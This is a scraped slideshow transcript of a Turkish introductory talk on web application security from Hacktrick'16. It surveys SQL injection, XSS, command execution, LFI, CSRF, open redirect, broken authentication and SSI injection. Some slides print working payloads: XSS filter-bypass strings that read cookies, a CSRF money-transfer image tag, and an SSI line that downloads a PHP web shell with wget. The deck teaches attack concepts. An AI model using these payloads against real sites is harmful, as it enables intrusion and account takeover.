Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Web Application Security

Hacktrick`16 PWN101 - Web Application Security

Web Application Security

  1. 1. Web Applica Pwn 101
  2. 2. Cyber Security Consultant at Co-Founder at Hakkı YÜCE Murat YILMAZLAR CVWA Team Lead at Biz Kimiz?
  3. 3. Yaygın Web Açıklıkları • ● SQL Injection ● Cross Site Scripting ( XSS ) ● Command Execution ● Directory Traversal / LFI / RFI ● Code Injection ● Insecure Direct Object Reference ( IDOR ) ● Cross Site Request Forgery ( CSRF / XSRF ) ● Open Redirections ● Broken Authentication / Session
  4. 4. Web Enumaration • Robots.txt Whois • Google Hacking Database • Pastebin • Have I Been Pwned • Archive.org • Recon-ng • TheHarvester Discover • Dirbuster
  5. 5. SQL Injection
  6. 6. SQL Injection Saldırganın, SQL sorgusunun amacını değiştirerek sorguyu kendi çıkarları doğrultusunda çalıştırmasına olanak sağlayan güvenlik zafiyetidir.
  7. 7. SQL Injection Error Based Union Based Blind Based Time Based Bir uygulamada veritabanı i lemleri yapılırken beklenenin dı ında sorgular gönderilerekş ş SQL sorgusunun bozularak hata mesajı vermesi ve bu hata mesajının istemciye yansıtılması Error Based SQL Injection denir. UNION, iki farklı tablonun birle tirilmesi için kullanılan bir SQL komutudur ancak tablolarş birle tirilmesi için her iki tablonunda sütun sayıları e it olması gerekir. Haliyle e it olmadış ş ş ğ için hata mesajı dönecektir, bu durumda hata giderilene kadar sütun sayısı arttırılır ve sütu sayısı tespit edilerek, tablolar istemci tarafında görüntülenebilir. Bu SQLi türünün sömürülmesi de Error Based türüne benzer ancak zafiyetin tespitinde hat mesajı görüntülenmez, gönderilen parametre de erlerine göre sayfa içerisinde de i ikliklerğ ğ ş meydana gelir ve bu ekilde zafiyet tespit edilebilir.ş Bazı durumlarda sayfada herhangi bir de i iklik olmaz, hata mesajı görüntülenmez ancak sğ ş orada zafiyet bulundu una eminsinizdir, bu gibi durumlarda veritabanının yanıtlama süresiğ dikkate alınarak sorgulama gerçekle tirilir.ş
  8. 8. XSS
  9. 9. XSS HTML kodları arasında istemci tabanlı kod eklenmesi yoluyla, Kullanıcının tarayıcısında istenilen kodun çalı tırılabilmesi olarak tanımlanıyor.ş XSS zafiyeti genellikle Javascript betik dili kullanılarak exploit edilir. Cünkü en temel HTML sayfalar içinde bile en rahat çalı tırılabilecek betik dil Javascriptdir.ş Tarayıcılar xss saldırısında kullanılan kodların sistemde bulunan bir script olup olmadı ınığ XSS zafiyetlerinde saldırı senaryoları de i ir ancak genel amaç sistemde yetki sahibi kullaniğ ş Ya da hedef kullanıcının hesap bilgilerini ele geçirmektir.
  10. 10. XSSReflected XSS Bu tür xss zafiyetlerinde kodlar kalıcı olarak çalı tırılmaz.ş Bu tür zafiyeti sömürmek için hedef üzerinde zararlı ba lantının çalı tırılması gerekir.ğ ş Zafiyetin sömürülece i javascript kodlarının bulundu u ba lantı hedefe gönderilirğ ğ ğ Ve gonderilen hedefin ba lantıyı açması beklenir.ğ Stored XSS DOM XSS Bu tür xss zafiyetlerinde sisteme zararlı javascript kodları eklenilmesi mümkündür. Zafiyetli ba lantıdan gönderilen zararlı kodlar veritabanına kayıt olacaktır.ğ OM; HTML taglarının genel adıdır. Bu tür XSS zafiyetinde javascript ile HTML taglarının ellikleri, de erleri vs. de i tirilebilmektedir.ğ ğ ş flected XSS türünde oldu u gibi sadece ba lantıyı açan istemciler saldırıdan etkilenir.ğ ğ Self XSS
  11. 11. XSS WAF Bypass HTML 5 event handlers: Onclick Onmousemove Onmousewheel Ontoggle onfocus Obfuscation: </scscriptript><scscriptript>alalertert(document.cookie)</scriscript></s <SC<script>RIPT>alert(‘CanYouPwnMe’)</SC</script>RIPT> Sucuri WAF Bypass: <b/oncut=alert(1)> Alert yerine farkli degisken: Confirm, prompt, eval(atob(onpageshow(document.domain)))
  12. 12. Command Execution
  13. 13. Command Execution Hedef sunucuda do rudan sistem komutu çalı tırılmasına yol açan güvenlik zafiyetidir,ğ ş Bu zafiyetin bulunması için uygulamada sistem üzerinde komut çalı tıran bir alan/ba lantış ğ bulunması gerekir bu sebeple nadir rastlanılan bir zafiyet türüdür. > echo Can you pwn me? | echo Yes, I can babe
  14. 14. Directory Traversal / LFI Hedef üzerinde yetkisiz olarak dizinler arasında gezinti yapabildi imiz zaafiyet türüdür.ğ Bu zafiyetle bütün dizinler arası gezilebilir ancak okuma izni varsa dosyalar okunabilir.
  15. 15. Code Injection Hedef sistemde çalı tırılan fonksiyonların yapısını bozarak araya kendi çıkarları do rultusundş ğ stenilen kodun çalı tırılmasına yol açan zafiyet türüdür.İ ş system('uname -a');
  16. 16. Insecure Direct Object Reference ● Kullanıcı verisini tekil olarak kullanma ● Kar ıdan gelen kullanıcı verilerinin kontrol edilmemesiş ● stenilen veriyi gerçekten o ziyaretçi mi istedi?İ ● stenilen veri gerçekten ziyaretçiye mi ait?İ
  17. 17. Cross Site Requested Forgery (CSRF) Saldırı, herhangi bir son kullanıcının kullandı ı uygulamada iste i dı ında i lemler yaptırtılmasıyla gerçekle tirilir.ğ ğ ş ş ş <img src=“http://hacktrickatak.com/parayi_akit.php?gelen=Murat&giden=Hakki&para=1000” width=“0” height=“0”>
  18. 18. Open Redirection undu u sistemlerde, kendisini kullandırarak hackerlar tarafından hazırlanmı zararlı sayfağ ş lantı açılmasına yol açan güvenlik zafiyetidir. Phishing Itemi enilir sitelerde bulunursa +9 phishing itemi p://google.com.tr//faceboook.com/login.php
  19. 19. Broken Authentication Parolalarin direkt olarak veritabani icinde tutulmasi Adres satirindan oturum kimligini yonetmek Zaman asimi olmayan oturum kimlikleri http://canyoupwn.me/account.php?SESSIONID=4956we77b89a54s84e12vae7
  20. 20. SSI Injection Server Side Inclusion'in kisaltilmis halidir. Yalnizca .shtml , .stm ve .shtm sayfa uzantilarinda calisir. <!--#exec cmd="ls" → <!--#exec cmd="wget http://canyoupwn.me/shell.txt | rename shell.txt shell.php" -->
  21. 21. Target Attacking Hedef sistemde web aciklari taranir. Reverse ip lookup yapilip serverdaki sitelere bakilir. erverdaki sitelerde zafiyet taramasi yapilir. Whois ciktisi alinip sistem yoneticisine saldiri yapilir. ( Phishing, brute-force v.s Domain ve hosting sirketlerine ayni adimlar gerceklestirilir.

×